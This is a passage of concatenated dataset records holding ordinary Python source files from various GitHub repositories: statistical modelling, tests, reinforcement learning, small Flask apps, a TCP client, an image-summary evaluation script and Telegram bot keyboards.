w_g in chunk_grouped_data(Z, X[:, self.ff_idx], y, weights, group_ids=group_ids):\n Zs_by_r[len(Z_g)].append(Z_g)\n ys_by_r[len(Z_g)].append(y_g)\n Xs_by_r[len(Z_g)].append(X_g)\n ws_by_r[len(Z_g)].append(w_g)\n\n # compute log-prob per batch:\n re_dist = self.re_distribution(gf)\n log_probs = []\n for r, y_r in ys_by_r.items():\n ng = len(y_r)\n X_r = torch.stack(Xs_by_r[r])\n Z_r = torch.stack(Zs_by_r[r])\n w_r = torch.stack(ws_by_r[r])\n\n # counter-intuitively, it's faster (for `backward()`) if we call this one per batch here (vs. 
calling for\n # the entire dataset above)\n loc = self.fixed_effects_nn(X_r)\n if len(loc.shape) > 2:\n loc = loc.squeeze(-1)\n\n # import pdb\n # pdb.set_trace()\n # mvnorm = WoodburyMultivariateNormal(\n # loc=loc,\n # sigma_diag=self.residual_var * 1 / w_r.sqrt(),\n # Z=Z_r,\n # re_precision=re_dist.precision_matrix.expand(ng, -1, -1),\n # validate_args=False\n # )\n cov_r = Z_r @ re_dist.covariance_matrix.expand(ng, -1, -1) @ Z_r.permute(0, 2, 1)\n sigma_diag_r = self.residual_var / w_r\n if torch.isnan(cov_r).any() or torch.isinf(cov_r).any():\n raise ValueError(\"Nans/infs in parameters\")\n mvnorm = _mvnorm_eps(loc, sigma_diag_r, cov_r)\n\n log_probs.append(mvnorm.log_prob(torch.stack(y_r)))\n\n return torch.cat(log_probs).sum()\n\n\ndef _mvnorm_eps(loc, sigma_diag, cov, start_eps: float = .000001) -> MultivariateNormal:\n mvnorm = None\n eps = start_eps\n while mvnorm is None:\n try:\n mvnorm = MultivariateNormal(\n loc=loc, covariance_matrix=torch.diag_embed(sigma_diag + eps) + cov, validate_args=True\n )\n except (ValueError, RuntimeError):\n eps *= 10\n if eps > .01:\n raise\n return mvnorm\n","repo_name":"strongio/torch-hlm","sub_path":"torch_hlm/mixed_effects_module/gaussian.py","file_name":"gaussian.py","file_ext":"py","file_size_in_byte":8782,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"41987431422","text":"import numpy as np\nimport pytest\nimport simulation as simulation\n\n\n@pytest.fixture\ndef solar():\n solar_calculations = simulation.environment.SolarCalculations()\n return solar_calculations\n\n\ndef test_apply_cloud_cover1(solar):\n test_cloud_cover = np.array([0, 0, 0])\n test_GHI = np.array([1, 2, 3])\n\n result_GHI = solar.apply_cloud_cover(GHI=test_GHI, cloud_cover=test_cloud_cover)\n\n expected_GHI = np.array([1, 2, 3])\n assert np.all(result_GHI == expected_GHI)\n\n\ndef test_apply_cloud_cover2(solar):\n test_cloud_cover = np.array([100, 100, 100])\n test_GHI = np.array([1, 2, 1])\n\n result_GHI = solar.apply_cloud_cover(GHI=test_GHI, cloud_cover=test_cloud_cover)\n\n expected_GHI = np.array([0.25, 0.5, 0.25])\n assert np.all(result_GHI == expected_GHI)\n","repo_name":"UBC-Solar/Simulation","sub_path":"tests/test_solar.py","file_name":"test_solar.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"61"}
+{"seq_id":"36837318831","text":"import numpy as np\nnp.random.seed(123)\nimport torch\nimport torch.optim as optim\n\nfrom sushigo.learning.pg_ff.players.simple_player import Simple_player\nfrom sushigo.learning.pg_rnn.players.pg_player import Pg_player\nfrom sushigo.learning.pg_rnn.policies.rnn_policy import Policy, finish_game\nfrom sushigo.learning.pg_rnn.util.util import adjust_learning_rate\nfrom sushigo.deck import StandardDeck\nfrom sushigo.game import Game\n\n#Set up policy\npolicy = Policy('LSTM',22,20,1,11)\ntorch.manual_seed(123)\n\n#Parameters\ngamma = 0.99\n\n#Set up optim\nlr = 1e-2\noptimizer = optim.Adam(policy.parameters(), lr=lr)\nlog_interval = 10\n\n\n#Play games\ndeck = StandardDeck()\nN_cards = len(list(set([str(_) for _ in deck])))\np1 = Pg_player(policy=policy,name=\"PG_player01\")\np2 = Simple_player(weights=[1/N_cards]*N_cards,name=\"SIMPLE_player01\")\n\newma = 0.5\nalpha = 0.95\nfor n in range(100):\n game = Game([p1,p2],verbose=False)\n game.simulate_game()\n win = game.did_player_win(p1.name)\n ewma = alpha*ewma + (1-alpha)*int(win)\n print('At %3i ewma win ratio %5.3f'%(n,ewma))\n\n finish_game(policy, gamma=gamma, optimizer=optimizer)\n p1.prev_reward = None\n optimizer = adjust_learning_rate(optimizer,n,lr,30)\n","repo_name":"koaning/sushigo","sub_path":"sushigo/learning/pg_rnn/main_rnn_pg.py","file_name":"main_rnn_pg.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"}
+{"seq_id":"20722881957","text":"# -*- coding: utf-8 -*-\n\nfrom flask import Flask, render_template, jsonify, request\nfrom flask_assets import Environment\nfrom moody import chatbot\nimport os\n\n\napp = Flask(__name__)\nassets = Environment(app)\n\n\n@app.route(\"/\")\ndef home():\n\n question = request.args.get('question')\n\n if question:\n response = chatbot.get_response(question)\n\n return jsonify(response.text)\n else:\n return render_template('base.html')\n\n\nif __name__ == \"__main__\":\n\n PORT = int(os.environ.get(\"PORT\", 5000))\n DEBUG = os.environ.get(\"DEBUG\", True)\n\n extra_files = ['./templates/base.html', './static/css/styles.css']\n\n app.run(host=\"0.0.0.0\", port=PORT, debug=DEBUG, extra_files=extra_files)\n","repo_name":"agnaite/moody-bot","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"10583911505","text":"from flask import Flask, render_template, request, redirect, session\napp = Flask(__name__)\napp.secret_key = 'counter.coding.dojo'\n\n@app.route('/')\ndef index():\n if 'counter' in session:\n session['counter'] += 1\n else:\n session['counter'] = 1\n return render_template('index.html')\n\n@app.route('/destroy_session', methods = ['POST', 'GET'])\ndef destroy_session():\n session.clear()\n return redirect('/')\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"ezhu22/python","sub_path":"flask/flask_fundamentals/counter/counter.py","file_name":"counter.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"20707011026","text":"# -*- coding:utf-8 -*-\nimport socket\nimport time\nimport aisprotocol\nimport tcpclientClass\n\nhost = \"10.0.0.23\" #お使いのサーバーのホスト名を入れます\nport = 445 #適当なPORTを指定してあげます\nstartingTime = time.time()\n\ndef getCurrentTime():\n return time.time() - startingTime\n\nclient = tcpclientClass.tcpClient() #オブジェクトの作成をします\n\nclient.setHost(host, port) #これでサーバーに接続します\nclient.connect()\n\nclient.startRecieve()\n\nrobotinfo = []\nrobotinfo.append(aisprotocol.robotInfo())\n\nwhile True:\n time.sleep(1)\n client.send(robotinfo[0].buildData().encode('utf-8')) #適当なデータを送信します(届く側にわかるように)\n status, msg = client.getMsg()\n print(msg)\n print(\"time\" + str(getCurrentTime()))\n if status:\n sender_ip,sender_color,datalist = aisprotocol.decodeData(msg)\n\n onTable,robotIndex = aisprotocol.isOnTable(sender_ip,robotinfo)\n if not onTable:\n robotinfo.append(aisprotocol.robotInfo(sender_ip,sender_color))\n robotIndex = len(robotinfo)-1\n\n if not robotinfo[robotIndex].rawMsg2obj(msg):\n print(\"ERROR in processing data\")\n for e in robotinfo:\n print(e)\n","repo_name":"aisjapan/tcpCommunication","sub_path":"tcpclient.py","file_name":"tcpclient.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16724619288","text":"# lightningmodule catalog.\nfrom lightning.vision import ( # noqa\n ClassificationTrainer,\n DistillationTrainer,\n MMDetectionTrainer,\n MMPoseTrainer,\n MultiFramePoseLiftingTrainer,\n PoseLiftingTrainer,\n)\nfrom utils.pretrained import load_model_weights\n\nfrom ._get import _get\n\n\ndef get(name):\n return _get(globals(), name, \"LightningModule\")\n\n\ndef build(name, *args, **kwargs):\n return get(name)(*args, **kwargs)\n\n\ndef build_from_cfg(model_cfg, training_cfg, const_cfg={}):\n lightning_module = get(training_cfg[\"ID\"])\n model = lightning_module(model_cfg, training_cfg, const_cfg)\n\n # load model from path if specified.\n if \"state_dict_path\" in model_cfg:\n load_model_weights(\n model=model,\n state_dict_path=model_cfg[\"state_dict_path\"],\n is_ckpt=model_cfg.get(\"is_ckpt\", False),\n )\n\n return model\n","repo_name":"sieu-n/awesome-modular-pytorch-lightning","sub_path":"catalog/lightning.py","file_name":"lightning.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"61"}
+{"seq_id":"13369968711","text":"#!/usr/bin/python\n\n\"\"\"\nEmployee Scheduler v 0.1\nAuthor: Benjamin Ross benr22@gmail.com\nDate: 2/27\n\nScheduler Class\n\"\"\"\nfrom employee import Employee\nfrom shift import Shift\nimport random\n\nclass Chromosome:\n\n def __init__(self, shift = None):\n \"\"\"\n Constructor\n @param shift: shift being scheduled\n \"\"\"\n \n if shift is None:\n self.shift = None\n else:\n self.shift = shift\n\n self.fitness = 0 \n\nclass Schedule:\n\n def __init__(self, shifts = None, employees = None):\n \"\"\"\n Constructor\n @param shifts: list of shifts to schedule\n @param employees: list of employees\n \"\"\"\n\n if shifts is None:\n self.shifts = None\n else:\n self.shifts = shifts\n\n if employees is None:\n self.employees = None\n else:\n self.employees = employees\n\n self.chromo_list = None\n\n def set_shifts(self, shifts):\n \"\"\"\n Sets the shifts\n \"\"\"\n\n self.shifts = shifts\n\n def get_shifts(self):\n \"\"\"\n Returns the shifts\n \"\"\"\n\n return self.shifts\n\n def set_employees(self, employees):\n \"\"\"\n Sets the employees\n \"\"\"\n \n self.employees = employees\n\n def init_schedule(self):\n \"\"\"\n Initalizes the shifts with random employees\n \"\"\"\n\n self.chromo_list = [Chromosome] * len(self.shifts.size)\n \n while iter is not len(self.chromo_list.size):\n self.chromo_list[iter].shift = self.shifts[iter]\n\n \n","repo_name":"bpross/MyCourses-Scheduler","sub_path":"algorithm/employee_scheduler/schedule.py","file_name":"schedule.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"6092840895","text":"\nimport pyximport\n\nfrom config import COCO_SGS_dir\n\npyximport.install(language_level=3)\nfrom competitors.charts import plot_comparison_both, plot_comparison_coverage, plot_comparison_diversity\n\n\n\nfrom competitors.kmeodids import compute_BOW_descriptors, read_BOW_images, kmedoids_summary, get_kmedoids_graphs, \\\n competitors_dir\n\nfrom sims.prs import edge_pruning, node_pruning, load_PRS\nfrom sims.scene_graphs.image_processing import getImageName\nfrom shutil import copyfile\nimport os\n\nimport pandas as pd\nimport json\n\nfrom sims.graph_algorithms import compute_coverage_matrix\nfrom sims.sgs_evaluation import evaluate_summary_graphs\nfrom sims.sims_config import SImS_config\nfrom sims.visualization import print_graphs\n\nif __name__ == \"__main__\":\n class RUN_CONFIG:\n compute_BOW_descriptors = False # Map each COCO image to its BOW descriptors\n run_kmedoids = False # Run KMedoids summary for different k values\n print_kmedoids_graphs = False # Print scene graphs of selected kmedoids images (for each k)\n\n use_full_graphs = False # True if you want to compute coverage on full graphs\n # False to apply node and edge pruning before computing coverage\n pairing_method = 'img_min' # Method used to associate images to SGS graphs (see associate_img_to_sgs() in sgs.pyx)\n # img_min, img_max, img_avg, std\n\n compute_kmedoids_coverage_matrix = False # Compute graph coverage matrix for kmedoids\n evaluate_kmedoids = False # Use coverage matrix to compute graph coverage and diversity of kmedoids\n write_comparison_charts = True # Write comparison charts between kmedoids and SImS (for white paper)\n\n #dataset = 'COCO_subset' # Choose dataset\n dataset = 'COCO_subset2'\n #dataset = 'COCO_subset3'\n\n if dataset == 'COCO_subset':\n mink = 4 # Min value of k to test kmedoids\n maxk = 20 # Max value of k to test kmedoids\n elif dataset in ('COCO_subset2', 'COCO_subset3'):\n mink = 2\n maxk = 20\n\n # Paths:\n dsname_prefix = []\n output_path = os.path.join(competitors_dir, RUN_CONFIG.dataset)\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n kmedoids_out_clusters_path = os.path.join(output_path, \"centroids.json\")\n config = SImS_config(RUN_CONFIG.dataset)\n # --------------------------\n\n # Feature extraction for each image in COCO training set\n if RUN_CONFIG.compute_BOW_descriptors:\n compute_BOW_descriptors()\n # KMedoids summary for different k values\n if RUN_CONFIG.run_kmedoids:\n X = read_BOW_images(RUN_CONFIG.dataset)\n res = {}\n avg_time = 0\n print(f\"Number of images: {len(X)}\")\n for k in range(RUN_CONFIG.mink, RUN_CONFIG.maxk+1):\n medoids, duration = kmedoids_summary(X, k)\n res[k] = (medoids, duration.seconds)\n avg_time += duration.seconds\n print(f\"{k}: {medoids}\")\n with open(os.path.join(output_path, \"log.txt\"),'a+') as f:\n f.write(f\"{k}: {medoids}\\n\")\n print(str(avg_time/len(res)))\n with open(os.path.join(output_path, \"avgTime.txt\"), 'w') as f:\n f.write('Average time for kmedoids run on COCO subset (seconds):\\n')\n f.write(str(avg_time/len(res)))\n with open(kmedoids_out_clusters_path,'w') as f:\n json.dump(res, f)\n # Print graphs associated to kmedoids\n if RUN_CONFIG.print_kmedoids_graphs:\n with open(kmedoids_out_clusters_path) as f:\n kmedoids_result = json.load(f)\n with open(config.scene_graphs_json_path, 'r') as f:\n coco_graphs = json.load(f)\n kmedoids_graphs = get_kmedoids_graphs(kmedoids_result, coco_graphs)\n\n for k, graphs in kmedoids_graphs.items():\n out_graphs_dir = 
os.path.join(output_path,'kmedoids_graphs',f'k{k}')\n if not os.path.exists(out_graphs_dir):\n os.makedirs(out_graphs_dir)\n print_graphs(graphs, out_graphs_dir)\n for i, g in enumerate(graphs):\n imgName = getImageName(g['graph']['name'], extension='jpg')\n copyfile(os.path.join(config.img_dir, imgName), os.path.join(out_graphs_dir, f\"g{i}.jpg\"))\n\n # Compute graph coverage for kmedoids (coverage matrix)\n if RUN_CONFIG.compute_kmedoids_coverage_matrix:\n with open(kmedoids_out_clusters_path) as f:\n kmedoids_result = json.load(f)\n with open(config.scene_graphs_json_path, 'r') as f:\n coco_graphs = json.load(f)\n kmedoids_graphs = get_kmedoids_graphs(kmedoids_result, coco_graphs)\n\n # Load pairwise relationship summary (PRS) if needed\n if RUN_CONFIG.use_full_graphs==False:\n prs = load_PRS(config, True)\n # Apply node and edge pruning before computing coverage matrix\n cmatrices_list = []\n omatrices_list = []\n for k, summary_graphs_i in kmedoids_graphs.items():\n if RUN_CONFIG.use_full_graphs == False:\n summary_graphs_i = edge_pruning(prs, summary_graphs_i)\n summary_graphs_i = node_pruning(summary_graphs_i)\n\n cmatrix, omatrix = compute_coverage_matrix(coco_graphs, [{'g':s} for s in summary_graphs_i])\n cmatrix.columns = list(range(int(k)))\n omatrix.columns = list(range(int(k)))\n cmatrix['k'] = k\n omatrix['k'] = k\n cmatrices_list.append(cmatrix)\n omatrices_list.append(omatrix)\n cmatrices = pd.concat(cmatrices_list, sort=True)\n omatrices = pd.concat(omatrices_list, sort=True)\n cmatrices.set_index('k', inplace=True)\n omatrices.set_index('k', inplace=True)\n cmatrices.index.name = 'k'\n omatrices.index.name = 'k'\n if RUN_CONFIG.use_full_graphs:\n output_file_c = os.path.join(output_path, \"coverage_mat_full.csv\")\n output_file_o = os.path.join(output_path, \"overlap_mat_full.csv\")\n else:\n output_file_c = os.path.join(output_path, \"coverage_mat_pruned.csv\")\n output_file_o = os.path.join(output_path, \"overlap_mat_pruned.csv\")\n cmatrices.to_csv(output_file_c, sep=\",\")\n omatrices.to_csv(output_file_o, sep=\",\")\n\n # Compute coverage and diversity for kmedoids\n if RUN_CONFIG.evaluate_kmedoids:\n with open(kmedoids_out_clusters_path) as f:\n kmedoids_result = json.load(f)\n with open(config.scene_graphs_json_path, 'r') as f:\n coco_graphs = json.load(f)\n kmedoids_graphs = get_kmedoids_graphs(kmedoids_result, coco_graphs)\n\n if RUN_CONFIG.use_full_graphs==False:\n suffix = \"_pruned\"\n suffix2=f\"_{RUN_CONFIG.pairing_method}\"\n else:\n suffix = \"_full\"\n suffix2 = \"\"\n cmatrices = pd.read_csv(os.path.join(output_path, f\"coverage_mat{suffix}.csv\"), index_col='k')\n omatrices = pd.read_csv(os.path.join(output_path, f\"overlap_mat{suffix}.csv\"), index_col='k')\n\n # Load pairwise relationship summary (PRS) if needed\n if RUN_CONFIG.use_full_graphs==False:\n prs = load_PRS(config, True)\n # Prune kmedoids graphs before computing coverage and diversity\n results = []\n for k, summary_graphs_i in kmedoids_graphs.items():\n if RUN_CONFIG.use_full_graphs == False:\n summary_graphs_i = edge_pruning(prs, summary_graphs_i)\n summary_graphs_i = node_pruning(summary_graphs_i)\n\n res = evaluate_summary_graphs([{'g':s} for s in summary_graphs_i], cmatrices.loc[int(k)].iloc[:,:int(k)], omatrices.loc[int(k)].iloc[:,:int(k)])\n results.append(res)\n\n kmed_df = pd.DataFrame(results, columns=[\"N. graphs\",\n \"Avg. nodes\", \"Std. 
nodes\",\n \"Coverage\",\n \"Coverage-overlap\",\n \"Diversity\",\n \"Diversity-ne\"])\n kmed_df.to_csv(os.path.join(output_path, f\"evaluation{suffix}.csv\"))\n\n # Write comparison charts for white paper\n if RUN_CONFIG.write_comparison_charts:\n if RUN_CONFIG.use_full_graphs==False:\n suffix = \"_pruned\"\n suffix2=f\"_{RUN_CONFIG.pairing_method}\"\n else:\n suffix = \"_full\"\n suffix2 = \"\"\n\n # Read SImS results\n sims_eval_path = os.path.join(config.SGS_dir, f'evaluation{suffix2}.csv')\n if not os.path.exists(sims_eval_path):\n print(\"You have to evaluate SImS first. Run main_SGS.py with evaluate_SGS_experiments=True\")\n exit()\n else:\n sims_df = pd.read_csv(sims_eval_path, index_col=0)\n\n # Aggregate experiments\n if 'subset2' in config.SGS_dir:\n sims_eval_path = os.path.join(COCO_SGS_dir + \"/subset2_agg/\", f'evaluation{suffix2}.csv')\n elif 'subset3' in config.SGS_dir:\n sims_eval_path = os.path.join(COCO_SGS_dir + \"/subset3_agg/\", f'evaluation{suffix2}.csv')\n\n if not os.path.exists(sims_eval_path):\n print(\"You have to evaluate SImS (agg) first. Run main_SGS.py with evaluate_SGS_experiments=True for aggregated datasets\")\n exit()\n else:\n sims_agg_df = pd.read_csv(sims_eval_path, index_col=0)\n\n # Read kmedoids results\n kmed_eval_path = os.path.join(output_path, f\"evaluation{suffix}.csv\")\n if not os.path.exists(kmed_eval_path):\n print(\"You have to evaluate Kmedoids first. Run main_competitors.py with evaluate_kmedoids=True\")\n exit()\n else:\n kmed_df = pd.read_csv(kmed_eval_path, index_col=0)\n\n plot_comparison_both(RUN_CONFIG.mink, RUN_CONFIG.maxk, sims_df, sims_agg_df, kmed_df, suffix2, output_path)\n plot_comparison_coverage(RUN_CONFIG.mink, RUN_CONFIG.maxk, sims_df, sims_agg_df, kmed_df, suffix2, output_path)\n plot_comparison_diversity(RUN_CONFIG.mink, RUN_CONFIG.maxk, sims_df, sims_agg_df, kmed_df, suffix2, output_path)\n # fig, ax = plt.subplots(1,2, figsize=[9,3])\n # ax[0].plot(np.arange(RUN_CONFIG.mink, RUN_CONFIG.maxk + 1), sims_df.loc[sims_df['N. graphs'] >= RUN_CONFIG.mink]['Coverage'], label='SImS',\n # marker='o', markersize='4', color='#33a02c', markerfacecolor='#b2df8a')\n # ax[0].plot(np.arange(RUN_CONFIG.mink,RUN_CONFIG.maxk + 1), kmed_df['Coverage'], label='KMedoids',\n # marker='o', markersize='4', color='#1f78b4', markerfacecolor='#a6cee3')\n # ax[0].set_xlabel('# graphs (k)')\n # ax[0].xaxis.set_major_locator(MaxNLocator(integer=True))\n # ax[0].set_ylabel('coverage')\n # ax[0].grid(axis='y')\n # ax[1].plot(np.arange(RUN_CONFIG.mink, RUN_CONFIG.maxk + 1), sims_df.loc[sims_df['N. 
graphs'] >= RUN_CONFIG.mink]['Diversity'], label='SImS',\n # marker='o', markersize='4', color='#33a02c', markerfacecolor='#b2df8a')\n # ax[1].plot(np.arange(RUN_CONFIG.mink,RUN_CONFIG.maxk + 1), kmed_df['Diversity'], label='KMedoids',\n # marker='o', markersize='4', color='#1f78b4', markerfacecolor='#a6cee3')\n #\n # ax[1].set_xlabel('# graphs (k)')\n # ax[1].xaxis.set_major_locator(MaxNLocator(integer=True))\n # ax[1].set_ylabel('diversity')\n # ax[1].grid(axis='y')\n # ax[1].legend(bbox_to_anchor=(1.6, 0.4), loc=\"lower right\")\n # plt.tight_layout()\n # plt.savefig(os.path.join(output_path, f'evaluation{suffix2}.eps'), bbox_inches='tight')\n\n\n\n # fig, ax = plt.subplots(1,2, figsize=[8,3], sharey=True)\n # ax[0].plot(np.arange(RUN_CONFIG.mink,RUN_CONFIG.maxk + 1), kmed_df['Coverage'], label='KMedoids',\n # marker='o', markersize='4', color='#1f78b4', markerfacecolor='#a6cee3')\n # ax[1].plot(np.arange(RUN_CONFIG.mink, RUN_CONFIG.maxk + 1), sims_df.loc[sims_df['N. graphs'] >= RUN_CONFIG.mink]['Coverage'], label='Coverage',\n # marker='o', markersize='4', color='#1f78b4', markerfacecolor='#a6cee3')\n # ax[0].set_xlabel('# graphs (k)')\n # ax[0].xaxis.set_major_locator(MaxNLocator(integer=True))\n # #ax[0].set_ylabel('coverage')\n # ax[0].grid(axis='y')\n # ax[0].set_title('KMedoids')\n # ax[0].plot(np.arange(RUN_CONFIG.mink,RUN_CONFIG.maxk + 1), kmed_df['Diversity'], label='KMedoids',\n # marker='o', markersize='4', color='#33a02c', markerfacecolor='#b2df8a')\n # ax[1].plot(np.arange(RUN_CONFIG.mink, RUN_CONFIG.maxk + 1), sims_df.loc[sims_df['N. graphs'] >= RUN_CONFIG.mink]['Diversity'], label='Diversity',\n # marker='o', markersize='4', color='#33a02c', markerfacecolor='#b2df8a')\n # ax[1].set_xlabel('# graphs (k)')\n # ax[1].xaxis.set_major_locator(MaxNLocator(integer=True))\n # #ax[1].set_ylabel('diversity')\n # ax[1].grid(axis='y')\n # ax[1].legend(bbox_to_anchor=(1.6, 0.4), loc=\"lower right\")\n # ax[1].set_title('SImS')\n # plt.tight_layout()\n # plt.savefig(os.path.join(output_path, f'evaluation2{suffix2}.eps'), bbox_inches='tight')\n","repo_name":"AndreaPasini/panoptic-segmentation","sub_path":"main_competitors.py","file_name":"main_competitors.py","file_ext":"py","file_size_in_byte":13381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23551624151","text":"#!/usr/bin/python\n#-*- coding: utf8 -*-\n\n''' Template for Google Code Jam '''\n\nimport sys\n\ndef main():\n ''' main '''\n case_num = int(sys.stdin.readline())\n for i in range(1, case_num+1):\n line = sys.stdin.readline().rstrip()\n args = line.split(' ')\n #answer = solve_small(int(args[0]))\n answer = solve_large(int(args[0]))\n print('Case #{0:d}: {1}'.format(i, answer))\n #print('Case #{0:d}: {1}'.format(i, args[0] + ' ' + str(answer)))\n\ndef solve_small(num):\n ''' solve problem '''\n if num < len(memo):\n for i in range(num, 0, -1):\n if isTidy(i):\n return i\n else:\n return False\n\ndef isTidy(num):\n key_num = 9\n while num != 0:\n mod_num = num % 10\n num = int(num / 10)\n if key_num < mod_num:\n return False\n else:\n key_num = mod_num\n return True\n\ndef solve_large(num):\n #321876 -> 321799 -> 299999\n numbers = [int(i) for i in list(str(num))]\n\n tmp_key = 0\n for i in range(0, len(numbers)):\n # if tidy\n if numbers[i] >= tmp_key:\n tmp_key = numbers[i]\n # if not tidy, make tidy\n else:\n for j in range(i, 0, -1):\n numbers[j] = 9\n numbers[j-1] -= 1\n if j-1 == 0 or numbers[j-1] >= numbers[j-2]:\n break\n for j in range(i+1, len(numbers)):\n numbers[j] = 9\n break\n\n return int(''.join(map(str, numbers)))\n\n# tidy memo\nmemosize = 10000\nmemo = [False] * (memosize + 1)\nfor i in range (0, len(memo)):\n if isTidy(i):\n memo[i] = True\n\nif __name__ == '__main__':\n #print(solve_large(110))\n main()\n # print(isTidy(1000))\n # print(isTidy(999))\n # print(isTidy(989))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/1106.py","file_name":"1106.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"3412543657","text":"import sys, os, subprocess\n\nif len(sys.argv)!=2:\n\tprint(\"Wrong parameters.\")\nelse:\n\trootdir = sys.argv[1]\n\tfor subdir, dirs, files in os.walk(rootdir):\n\t\tfor file in files:\n\t\t\tprint(\"Importing \" + file)\n\t\t\tprint(\"mvn install:install-file -Dfile=\" + os.path.join(subdir, file) + \" -DgroupId=\" + file.rstrip(\".jar\") + \" -DartifactId=\" + file.rstrip(\".jar\") + \" -Dversion=1.0\" + \" -Dpackaging=jar\" + \" -DgeneratePom=true\")\n\t\t\tsubprocess.run([\"mvn\", \"install:install-file\", \"-Dfile=\" + os.path.join(subdir, file), \"-DgroupId=\" + file.rstrip(\".jar\"), \"-DartifactId=\" + file.rstrip(\".jar\"), \"-Dversion=1.0\", \"-Dpackaging=jar\", \"-DgeneratePom=true\"], shell=True)\t\t\t\n\t\t\twith open('dependencies.txt', 'a') as output:\n\t\t\t\toutput.write(\"\\n\")\n\t\t\t\toutput.write(\"\\t\" + file.rstrip(\".jar\") + \"\\n\")\n\t\t\t\toutput.write(\"\\t\" + file.rstrip(\".jar\") + \"\\n\")\n\t\t\t\toutput.write(\"\\t1.0\\n\")\n\t\t\t\toutput.write(\"\\n\\n\")\n\t \n\tprint(\"Process terminated successfully.\")\n","repo_name":"diegodepablos/local2mvn","sub_path":"local2mvn.py","file_name":"local2mvn.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"8109533830","text":"import multiprocessing\nfrom ursina import *\nimport mediapipe\nimport cv2\nimport pyautogui\n\nspd = 0.1\n\napp = Ursina()\n\nplayer = Entity(model='cube', scale=2, color=color.red)\n\ncap = cv2.VideoCapture(0)\n\nmpHands = mediapipe.solutions.hands\nhands = mpHands.Hands()\nmpDraw = mediapipe.solutions.drawing_utils # For drawing landmarks\n\nid8_positions = []\nid4_positions = []\nid12_positions = []\nposition_list = []\n\ndef update():\n player.x += held_keys['d'] * 0.1\n player.x -= held_keys['a'] * 0.1\n player.y += held_keys['e'] * 0.1\n player.y -= held_keys['q'] * 0.1\n player.z += held_keys['w'] * 0.1\n player.z -= held_keys['s'] * 0.1\n\n player.rotation_x += held_keys['r'] * 5\n player.rotation_y += held_keys['f'] * 5\n player.rotation_z += held_keys['t'] * 5\n\n\ndef run_game():\n while True:\n print('running')\n\n\ndef run_cv():\n while True:\n print('running')\n\n\nif __name__ == '__main__':\n\n p2 = multiprocessing.Process(target=run_cv)\n p2.start()\n p2.join()\n\n print('done')\n app.run()\n\n cap.release()\n cv2.destroyAllWindows()\n","repo_name":"timnirmal/Ursina","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"5207408567","text":"from aiogram.types import InlineKeyboardMarkup, InlineKeyboardButton as ikb\n\n\ndef category_edit(category_id, remover):\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"🏷 Изм. название\", callback_data=f\"category_edit_name:{category_id}:{remover}\")\n ).add(\n ikb(\"⬅ Вернуться ↩\", callback_data=f\"catategory_edit_swipe:{remover}\"),\n ikb(\"❌ Удалить\", callback_data=f\"category_edit_delete:{category_id}:{remover}\")\n)\n return keyboard\n\ndef category_edit_cancel(category_id, remover):\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"❌ Отменить\", callback_data=f\"category_edit_open:{category_id}:{remover}\"),\n )\n return keyboard\n\n# Кнопки с удалением категории\ndef category_edit_delete_selected(category_id, remover):\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"❌ Да, удалить\", callback_data=f\"category_delete:{category_id}:yes:{remover}\"),\n ikb(\"✅ Нет, отменить\", callback_data=f\"category_delete:{category_id}:not:{remover}\")\n )\n return keyboard\n\n\ndef category_remove_confirm():\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"❌ Да, удалить все\", callback_data=\"confirm_remove_category:yes\"),\n ikb(\"✅ Нет, отменить\", callback_data=\"confirm_remove_category:not\")\n )\n return keyboard\n\ndef item_remove_confirm():\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"❌ Да, удалить все\", callback_data=\"confirm_remove_item:yes\"),\n ikb(\"✅ Нет, отменить\", callback_data=\"confirm_remove_item:not\")\n )\n return keyboard\n# Кнопки при открытии позиции для изменения\ndef item_edit_open(item_id, category_id, remover):\n keyboard = InlineKeyboardMarkup(\n ).add(\n ikb(\"🏷 Изменить название\", callback_data=f\"item_edit_name:{item_id}:{category_id}:{remover}\"),\n ikb(\"💰 Изменить цену\", callback_data=f\"item_edit_price:{item_id}:{category_id}:{remover}\"),\n ).add(\n ikb(\"📜 Изменить описание\", callback_data=f\"item_edit_description:{item_id}:{category_id}:{remover}\"),\n ikb(\"📸 Изменить фото\", callback_data=f\"item_edit_photo:{item_id}:{category_id}:{remover}\"),\n ).add(\n ikb(\"❌ Удалить\", callback_data=f\"item_edit_delete:{item_id}:{category_id}:{remover}\"),\n ikb(\"⬅ Вернуться ↩\", callback_data=f\"item_edit_swipe:{item_id}:{remover}\"),\n )\n return 